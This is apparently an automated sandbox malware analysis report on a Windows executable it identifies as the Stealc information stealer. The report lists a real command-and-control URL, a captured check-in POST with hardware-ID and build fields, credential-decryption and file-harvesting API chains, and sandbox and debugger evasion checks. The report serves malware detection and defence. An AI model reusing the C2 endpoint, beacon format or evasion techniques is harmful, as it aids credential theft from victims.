Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544952
MD5:31c844530d857c4266248543c40284cc
SHA1:97f7aae6867695e025abdc5e1a7d446d7c5b875f
SHA256:81ccbbfcfd5e8991632a16d6b4d28b36ef74409773b3e5622cf58cf43638ce07
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 31C844530D857C4266248543C40284CC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6644JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6644JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ba0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T22:13:18.983215+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.ba0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00BB9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BAA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BA72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BAA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BAC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BB40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BAE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BAF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BB47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BA1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BADB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BB3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BB4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BAEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BABE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BADF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 42 42 35 43 31 32 46 35 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="hwid"6BBB5C12F5753799621165------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="build"tale------FHCGCFHDHIIIDGCAAEGD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BA62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 42 42 35 43 31 32 46 35 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="hwid"6BBB5C12F5753799621165------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="build"tale------FHCGCFHDHIIIDGCAAEGD--
                Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2176326944.000000000134A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
                Source: file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/2
                Source: file.exe, 00000000.00000002.2176326944.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3
                Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/:U
                Source: file.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE00980_2_00BE0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC41EC0_2_00FC41EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFB1980_2_00BFB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD21380_2_00BD2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE42880_2_00BE4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0E2580_2_00C0E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0C3DB0_2_00F0C3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1D39E0_2_00C1D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2B3080_2_00C2B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CE2EC0_2_010CE2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF04BF0_2_00FF04BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE45A80_2_00BE45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0D5A80_2_00C0D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC45730_2_00BC4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCE5440_2_00BCE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9B6CF0_2_00F9B6CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C296FD0_2_00C296FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE66C80_2_00BE66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1A6480_2_00C1A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF46390_2_00FF4639
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C167990_2_00C16799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FED7790_2_00FED779
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFD7200_2_00BFD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF98B80_2_00BF98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0F8D60_2_00C0F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFB8A80_2_00BFB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF48680_2_00BF4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF89930_2_00FF8993
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E989390_2_00E98939
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEBA940_2_00FEBA94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C08BD90_2_00C08BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C10B880_2_00C10B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C14BA80_2_00C14BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F84B2A0_2_00F84B2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1AC280_2_00C1AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF5DB90_2_00BF5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4DC80_2_00BF4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD1D780_2_00BD1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1D370_2_00FC1D37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF5D2C0_2_00FF5D2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFBD680_2_00BFBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0AD380_2_00C0AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C11EE80_2_00C11EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF6E940_2_00FF6E94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE8E780_2_00BE8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF1F290_2_00FF1F29
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BA4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fvvfrivq ZLIB complexity 0.9949130575525664
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BB9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00BB3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\IN2L35LD.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2094592 > 1048576
                Source: file.exeStatic PE information: Raw size of fvvfrivq is bigger than: 0x100000 < 0x194400
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fvvfrivq:EW;fjsconsa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fvvfrivq:EW;fjsconsa:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x200375 should be: 0x20d163
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fvvfrivq
                Source: file.exeStatic PE information: section name: fjsconsa
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA108 push 321921FEh; mov dword ptr [esp], esi0_2_010BA14B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107A117 push 02A8F92Dh; mov dword ptr [esp], edx0_2_0107A18E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCA0F2 push eax; retf 0_2_00BCA119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCA0DC push eax; retf 0_2_00BCA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01067165 push ebp; mov dword ptr [esp], edi0_2_01067194
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01065181 push 1B6DE272h; mov dword ptr [esp], edx0_2_0106518F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B051 push edi; mov dword ptr [esp], ebp0_2_00F8B08A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B051 push ecx; mov dword ptr [esp], edx0_2_00F8B0C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B051 push 12F6A33Ch; mov dword ptr [esp], edx0_2_00F8B0FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B051 push 67A49EB6h; mov dword ptr [esp], ebx0_2_00F8B127
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC41EC push eax; mov dword ptr [esp], ebx0_2_00FC41F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC41EC push 3C93E391h; mov dword ptr [esp], eax0_2_00FC422C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC41EC push esi; mov dword ptr [esp], edi0_2_00FC4238
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC41EC push eax; mov dword ptr [esp], ebp0_2_00FC42CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01096010 push 2D374D35h; mov dword ptr [esp], ecx0_2_01096089
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01099028 push 1E3B3646h; mov dword ptr [esp], ebp0_2_01099082
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108F03D push 138BEB52h; mov dword ptr [esp], edi0_2_0108F08B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FC034 push esi; mov dword ptr [esp], 381528BDh0_2_010FC09D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push 4CCBEA85h; mov dword ptr [esp], ebx0_2_0107E047
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push 5A609B12h; mov dword ptr [esp], ecx0_2_0107E0FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push 6ECB3A68h; mov dword ptr [esp], esi0_2_0107E169
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push esi; mov dword ptr [esp], edx0_2_0107E177
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push eax; mov dword ptr [esp], 6F5F1B81h0_2_0107E1A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push 5AD73E99h; mov dword ptr [esp], edi0_2_0107E1E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E038 push eax; mov dword ptr [esp], esi0_2_0107E1FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101806A push ebp; mov dword ptr [esp], esi0_2_010180AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101806A push edi; mov dword ptr [esp], esp0_2_0101811A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106B06D push 22C2893Dh; mov dword ptr [esp], edx0_2_0106B0EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106B06D push ebp; mov dword ptr [esp], edi0_2_0106B117
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D5066 push 2058CE04h; mov dword ptr [esp], ebx0_2_010D5033
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D5066 push 295712A7h; mov dword ptr [esp], esp0_2_010D503B
                Source: file.exeStatic PE information: section name: fvvfrivq entropy: 7.9536048042194505

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
